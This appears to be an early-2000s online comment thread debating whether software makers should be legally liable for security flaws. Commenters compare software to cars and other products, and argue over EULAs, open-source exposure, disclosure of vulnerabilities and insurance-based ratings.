That way each software maker could choose how much to invest in security and QA, and it would be more transparent for customers how secure a product really is, so they wouldn't have to rely on the software makers' advertising for that kind of information. In effect the insurance conditions and premiums for different kinds of software are already an indicator of its security, and the insurance companies probably have a high interest in accurately estimating the risks, so probably they should play some part in ensuring the proposed organisation's independence.
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
Great. A law that will punish developing companies who make a seldom used product that happens to have a security flaw that virtually no one knows about. It'd be great if we took away all their revenues while keeping their costs the same.
And for the real problems? Relax! IE is free.
With rights come responsibility. PJ O'Rourke said something along the lines of "Everyone has the right to do whatever they want, and the responsibility to accept the consequences."
Increasingly we are seeing laws aimed at reducing our responsibility. I don't know about where you might be, but in this country, it is the law that you have to wear a seatbelt in a car. More dramatically, modern VW Golfs (Rabbits in the States) weigh the better part of a tonne more than early models, entirely due to the safety devices that now have to be incorporated by law. The government is trying to legislate against dying if you drive stupidly. Don't get me wrong, these safety devices are very noble, but legislating their inclusion will continue until we have to drive at 5mph in cotton wool cars.
Laws to punish insecurity in software are precisely the same. I will not guarantee that my software will not blow up. I will not guarantee that it will not eat your enterprise. If you want me to guarantee these things, then you will not be able to afford the cost of my software, that I need to charge to pay my insurance bill.
You can legislate against all the responsibility in the world, but in the end, you will just have abdicated all your rights instead.
This rambling was brought to you by not_cub
q='echo "q=$s$q$s;s=$b$s;b=$b$b;$q"';s=\';b=\\;echo "q=$s$q$s;s=$b$s;b=$b$b;$q"
Read the comments above. I don't have a choice in using IE. It's tied to the OS; Microsoft admits it. You pay for the OS, so you pay for IE. So it'd better work. Same with Office. NOT the same for freeware I get from download.com, as it is my /choice/ to run that software, and I am not contributing to the resources that go into developing and testing it; ergo, in that scenario, I should be on my own.
"Old man yells at systemd"
Is Red Hat responsible for a collection of packages that they put together or just for the fine things they author and then sell? In other words, if I charge a fee for my ability to put things together for you, am I liable when those things don't work together?
I also worry for consultants. Can I deny the implied merchantability if I install Debian for you? Obviously you have hired me for a specific purpose and I'm supplying you with tools to meet that need.
There is a fine line here, and I'm not encouraged by my government's recent direction on other matters such as the DMCA. They can't be counted on to get the difference, or can they? Surely there are meat-space equivalents to elucidate the problem, but I worry that common sense may be just as lost here as it is in the confidentiality of email vs. US post and phone calls.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
"An influential body of researchers..."
If these guys were any good at research, they would have noticed that the largest single contributor to both the Democratic and Republican presidential campaigns (Not to mention plenty of other campaigns worldwide.) was Microsoft, the mother of all "... software firms that do not do enough to make their products secure." and realize that they have no hope of getting these laws passed in the US.
> I'm not sure it's fair to hold Microsoft responsible for making
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to reckoning for it.
Virg
Second, if any laws are written, my guess is they would merely extend already existing more generic laws regarding false advertisement. Under such circumstances, software vendors would not be *required by law* to produce secure software. But, if their advertising campaign, sales representatives, software packages blatantly lead potential consumers to believe that their product is of "enterprise-level", "mission-critical-caliber", "secure", "reliable" or any such wording which implies "secure software", then the law could provide for some serious compensations to the harmed consumer.
To avoid endless legal battles over wording, the government should define an entity whose role would be to design, draft and maintain a *very specific* scale of security levels which defines strong standards for security features within software packages. The scale could not only provide very precise security requirements for software, but also standards type of compensation to the consumer for failure to meet each of its levels' standards.
Such a scale should be massively advertised through all media so consumers would know to look for a software package's rating on it before purchasing it for any mission-critical purpose.
We could let software vendors rate their own software packages according to this scale. If the scale is *specific-enough* and clearly defines levels of security, then consumers should have very strong cases to bring to class-action law-suits to seek compensation in the case such software should fail to meet all of the requirements defined by their advertised grade on the scale.
Such a model would keep the government's involvement minimal and place all of the liabilities on the software vendor, so consumers don't ever have to seek compensation from some government-sanctioned entity which would assign ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
Extraordinary Vacations. Exceptional Prices
What's obvious malpractice to you and me, might not be so obvious to others.
No laws can be made to punish the software companies for faulty security or stability.
In EVERY EULA I have ever seen and read there is the following clause...
XYZ Co. is not liable for any use or misuse of this product; in fact the product is not warranted in any way, or even for suitability for any purpose.
All EULAs have the standard disclaimer that this might work, and it might kill 1/2 the planet's population...
Do not look at laser with remaining good eye.
> NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA
I wonder what this acronym is supposed to stand for. At first, I thought it meant "Not In My Backyard", but that's usually spelled NIMBY.
Not In My Butt AGAIN ?
I think this is a great idea, and should be extended into other areas. Penalize people who get sick. They should have taken better care of themselves and are costing the rest of us money. And people who have their houses knocked down by an earthquake or flattened by a storm should be fined as well for not taking the proper precautions.
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
> In any case you could equally say that Microsoft provides you the binary so why don't you just hexedit the security faults out.
We can't do that, because modifying or reverse-engineering the code is forbidden by the EULA.
So there.
Virg
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not necessarily opposed to such a law.
With regard to the specific example of IE, well, if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate against liability. If the flaw is in an OS component (as much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT to the "seldom used" product, well if the company charged money for it, and if it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
What I find far more scary is that if this were to be passed, software vendors would stop telling people that their software was buggy, in the hopes of hiding it. This was exactly the same tactic Microsoft took when releasing the XP patch- they didn't instantly recall their product, they sat on the bug for two weeks while the rest of the world floundered. Microsoft did this just for marketing- imagine if someone was also planning on pressing charges! More extensive laws will obviously just intensify this problem.
Another curiosity: consider for-profit companies, hired by either the government or opposing vendors, whose sole purpose is to exploit software in as many ways as they can, to make sure the American people are "safe".
Sure, why not? A piece of software should have a meaningful warranty and should comply with its own warranty. If software causes irreparable damage to something, we're way beyond, in the year 2002, the days of "Hey, if anything at all happens, if the software even works at all, it's not our problem."
If software has a problem which causes me to lose money or to lose my identity or some other problem, there is utterly no reason why the software maker can't or shouldn't be held responsible for fundamental flaws. We're not talking about usage or configuration or intended use but about basic patchable problems associated with foreseeable risks. No, product liability is not intended to hold the manufacturer liable for anything whatsoever, but for reasonable use. You can't reasonably sue a hairdryer maker if you drop it in the bathtub, but if in normal use it bursts into flames and burns you - yeah, you sure can. Same with software. If you're using it correctly and some fundamental problem shows up that could have been uncovered if they had bothered to do some rudimentary checking, then they should be held liable as well.
So you base your opinion of politicians based solely on the position that your party tells you to have? I think Nader's a moron too, but it's certainly not because my party says so.
How can we continue to believe in a just universe and freedom to eat crackers if we have no ale?
I'm sure that this is targeted at Microsoft, but there'd be a lot of $$$ made off of the folks that developed/distributed BIND and SendMail. Couldn't it also punish sites like Download.com?
... bits and bytes are insignificant when compared to the needs of the world and future generations, and anyone who thinks otherwise needs to re-examine their humanity) I seriously doubt you'd see any improvement for the consumer - the government is the only one who stands to gain, and that kind of greed puts them on the same level as Microsoft.
I know the argument is, "If it's free, it's not liable". So Microsoft reworks its license in such a way that all linked libraries are free (that's an oversimplification) or that you're paying for the right to install, but not the operating system itself. If they were still liable in that instance, then RedHat/Mandrake/Debian/etc would be in deep doo-doo.
So how do you prove that the software vendor is liable? If your brakes fail because you never filled your fluid, then the manufacturer is liable. If your operating system fails because you didn't patch it (and a patch was reasonably available), how different would the situation be?
What about modification? If I put aftermarket rims on my car, that will likely void my warranty and some issues of liability (oversimplification, again). So, a software vendor could make claims that "unauthorized" software (probably open to their interpretation) could have "unexpected" interaction, possibly releasing them from liability.
Another thought: safety recalls. Most of the time, there are not fines for "unsafe" products - there are voluntary or government mandated recalls. If you choose not to return the product, that's your fault. So, when there's a new "security flaw", MS recalls Windows, and you have to uninstall it from your computer and return your media for a refund or replacement. How would that fly? (Many "simple" consumers have a hard time differentiating between the computer and the software: they bought a "Dell": further complicating things)
Retrospective? Would this only apply to new shipments, or to all of the copies of Linux, Mac, and Windows already out there? That'd be a tough sell.
The bottom line: this is motivated by politics and money. It would do nothing to enhance security and consumer rights. Many large companies will freely dump their waste, knowing that it's cheaper to pay the fine than it is to dispose of it "the right way". They just consider the fine an operating cost, which usually gets integrated into their pricing structure. So MS raises their prices to accommodate fines. I seriously doubt the fine would be significant. (Go back to the dumping example: if software flaws result in a bigger fine than destroying the environment, we're all in trouble.)
The best thing about a boolean is even if you are wrong, you are only off by a bit.
I'd say the proper analogy to security problems would be you lock the check in the glovebox of the car and lock the doors, but due to a defect in the design or manufacturing process ( not just a random defective part, but either the design causes this or all parts made are defective ) the locks all spring open if someone hits the passenger-side door hard, letting a thief steal everything in the car. In that case the car maker probably would be held liable for the defects because they should've caught them and, quite simply, the locks aren't performing as locks are expected to perform.
Like I said, we treat software the way we treat cars in this regard. We don't hold car makers liable for the modifications their customers make after they've bought the car, or if their customers abuse the car ( eg. taking a Corvette on a cross-country off-road race ). But we hold them liable for the way they design and make the cars ( eg. designing a car where the fuel tank is placed so it ruptures on any rear-end impact, or manufacturing tires without doing any quality control to make sure they won't explode while driving normally ).
I said this a while back and I'm saying it again:
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use, the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I can not make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide what systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks and the same as selling flammable pajamas to children. Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover the problem and the time they warn users of the problem. These kinds of penalties will force companies to create secure systems in the first place. And, to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting I don't think the developers should be required to fix the system. But, a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about what systems to use. We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But, we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead", notify all customers of record that no more security support will be given for that product. Declaring the software dead should also require that the source code and/or system designs as well as any patent and copyrights to the system be released to the customers so that customers can arrange for other sources of security support for the system. At that point the company would not be allowed to sell, distribute, or accept any sort of payment including royalties and support payments for the software.
Stonewolf
Though, I don't know what a real law would look like...
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned because you couldn't swim.. and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But.. say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break a leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked.. the owner still had a duty to keep the area safe for its users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks.. state that the facilities are in bad repair and broken.)
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
This has nothing to do with the discussion.
Look, there are insecure software packages out there. But for each of those insecure software packages there is a more secure alternative. If anyone disagrees with me and has a specific example, please reply.
If organizations have been choosing the insecure packages, they have made their bed to sleep in. Asking a government to step in because they made a choice that turned out to have more risks than they anticipated is disingenuous and naive of that organization.
obviously no deficiencies vs. no obvious deficiencies
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources, but in such a way that the casual reader assumes it was a recommendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise, I find it hard to find any recommendations. The majority of the report is simply a post-9/11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions.
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
Right, but those are all the problems it should cover. If a car maker does a recall to fix a problem and gives the owner sufficient notice of the problem and the owner doesn't take his car in to get it fixed, the car maker isn't liable for things that happen after the recall was issued. Same with software, if a fix was made and publicized sufficiently well and the user didn't apply it, it's not the software vendor's problem anymore.
With open source, the source code is there for others to fix. That's the whole point of open source. With companies like Microsoft, you get someone sending them an exploit, and them taking 4 months to fix the damn thing because they don't want to hurt Christmas sales. I think that a company, especially one that is charging you for upgrades while you assume they're going to be more secure, should be liable to a certain extent. Many companies are pushing for you to upgrade your software, but what are we really getting? I don't need a clipboard buddy, I want something more stable and more secure.
I have no signature
If they weren't calling in federal marshals for help in conducting audits, it might seem different, but what possible excuse is there for releasing them from any and all responsibility while THEY can have people with guns and warrants busting into your workplace and tearing apart all your computers?
Hold them to the same strict code that they hold others, and give it just as many teeth as they want to use against you. Granted, that would be hard (imagine getting a warrant to rip apart all the Windows development systems at Microsoft to look for evidence that a bug was maliciously ignored!) but it is starkly insane to expect these guys to have police-like powers yet be exempt from all responsibility themselves.
One element which you are forgetting is that the free market depends upon its participants being knowledgeable
This is not necessarily true. Given a large number of unknowledgeable participants in a market, to the degree that they cannot tell if they have chosen a poor product even after the fact: some of them will choose poor products, and by luck some will accidentally choose better products.
Those that go out of business will stop buying the poor products, or at least not expand as quickly as the business which made better decisions.
In reality it is somewhat difficult to tell how good your security is until you've been breached.
It is also true that the market is not really large enough for a fully liquid "Free Market".
The truth is somewhere in the middle, where companies that make it their business to be informed about security will have an advantage over those that do not, hence government intervention will be bad: it will encourage businesses to let an external organization worry about their security.
If the government wants to see some progress made in nation-wide computer security, they ought to not waste money punishing big dumb companies, but instead fund the geeks over at the NSA to work on Open Source security-related projects, much as they did with Linux and ACLs. Otherwise, I fail to see how the courts could be objective. Accidents happen. Would companies get a quota of security holes per year?
Everyone would be in violation....
And of course, if Microsoft is too important to the country to be punished under anti-trust law, what're the chances they (or any other large corp with big bottom lines and lots of legal dollars) would be punished under security law?
BUT.... what if security _claims_ were regulated by a much tighter law -- say, much like SEC filings. I have never read a prospectus that was anything but pessimistic about a company's prospects -- that's because they know that if they put anything that's hype in it, they may as well write a check out for the lawsuit that's coming and perhaps pack for a trip to white-collar jail. OK, unless you're Milliken (?, that one guy pardoned by Clinton who hid in Switzerland for 10 years).
Require an SEC-like full disclosure of known vulnerabilities. Assess daily penalties for each week a known vulnerability is kept secret (if you like, only assessed from the day it's found in the wild). Make advertising about security a binding promise. Software companies would be a lot more careful about what they claim and more forthcoming about actual information. And in the presence of more perfect information, the market will serve ALL parties more effectively.
Just my thoughts....
Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
"I don't care what your EULA says. I didn't agree to it. I didn't install the software." -- Me
Of course it won't work, but then neither should their EULA garbage if it ever gets in front of a halfway intelligent judge.
Personally, I think the greens and libertarians should merge. I am a green, yet I'm not a socialist or pro dope. I'm a capitalist and a believer in freedom.
Maybe they should regroup as liberal greens?
I have a Libertarian friend and we are at complete odds on most issues. Technically speaking, I'm a left-leaning authoritarian* and he's a right-leaning Libertarian. Refer to the Nolan chart. Greens are actually best matched with the Natural Law party.
Well, keeping this on topic, I find myself agreeing with Libertarians in that I don't think that we should pass such a law... right now. The people in congress are far too corrupt to even consider pushing something like that through them. Only the small companies will be hurt by the monstrosities that they are capable of creating. What we need right now is campaign finance reform, so that in the future we can have decent lawmakers who will pass such a law and make it fair.
* This does not mean I am a Communist. I do not approve of dictatorships.
Remember "Bring 'em on"? *sigh
Ask any pharmaceutical or biotech company what happens when one of their products fails and someone is injured. They'll tell you oftentimes there are criminal as well as civil penalties. If Ford had to make a safe Pinto, why shouldn't software vendors be forced to make secure software?
Many will argue that bad software isn't life threatening, and therefore doesn't require stiff penalties. I say baloney! If the firmware that controls the hydraulic systems on an aircraft fails in flight you probably won't survive. If the database on your e-commerce site gets hacked due to a "buffer overflow" error, and all your credit cards get out on the web, shouldn't someone be held liable for the damages... or are we going to let the insurance industry just mop up the damage and pay for it with higher premiums?
There has to be some accountability for negligent behavior.
-ted
>We want to destroy the DMCA that restricts our freedom of speech, and yet we want to RESTRICT companies from doing what they want.
Yes. But they're allowed to SPEAK about what they want. That's not hypocritical, that's the difference between speech and action.
//rdj
No one can understand the truth until he drinks of coffee's frothy goodness.
--Sheikh Abd-Al-Kadir, 1587
I'm not following your logic at all. How did you get from modifying the source of a program vs. hacking the executable to GPL issues? To wit, the original discussion was about modifying a program your company uses. My point was that altering OSS was different from hacking Microsoft because you're not legally allowed to hack the .EXEs, but you're legally allowed to monkey with OSS. The GPL in this case would only apply to redistributed code, not "internal, proprietary software development" (your words). And while RMS and Co. could lay on a lawsuit charging you with pilfering GPL code within a program you sell, they'd have to prove it just like anyone else who wants to sue you, so there's no larger risk of litigation than from any code jockey you ever come in contact with.
> Of course all code isn't GPLd...but that which is represents a similar risk to the EULA.
Not at all. They're different animals, with different situations. As stated above, the GPL applies only to redistributed code. If I get a copy of Red Hat Linux and munge the kernel code to run faster on my local Frankensystem 2002, but I don't redistribute that code outside my business, the GPL never applies. Hacking WINWORD.EXE is always, under every circumstance, illegal, even if I then don't even run the modified executable. Just changing it is a violation.
Virg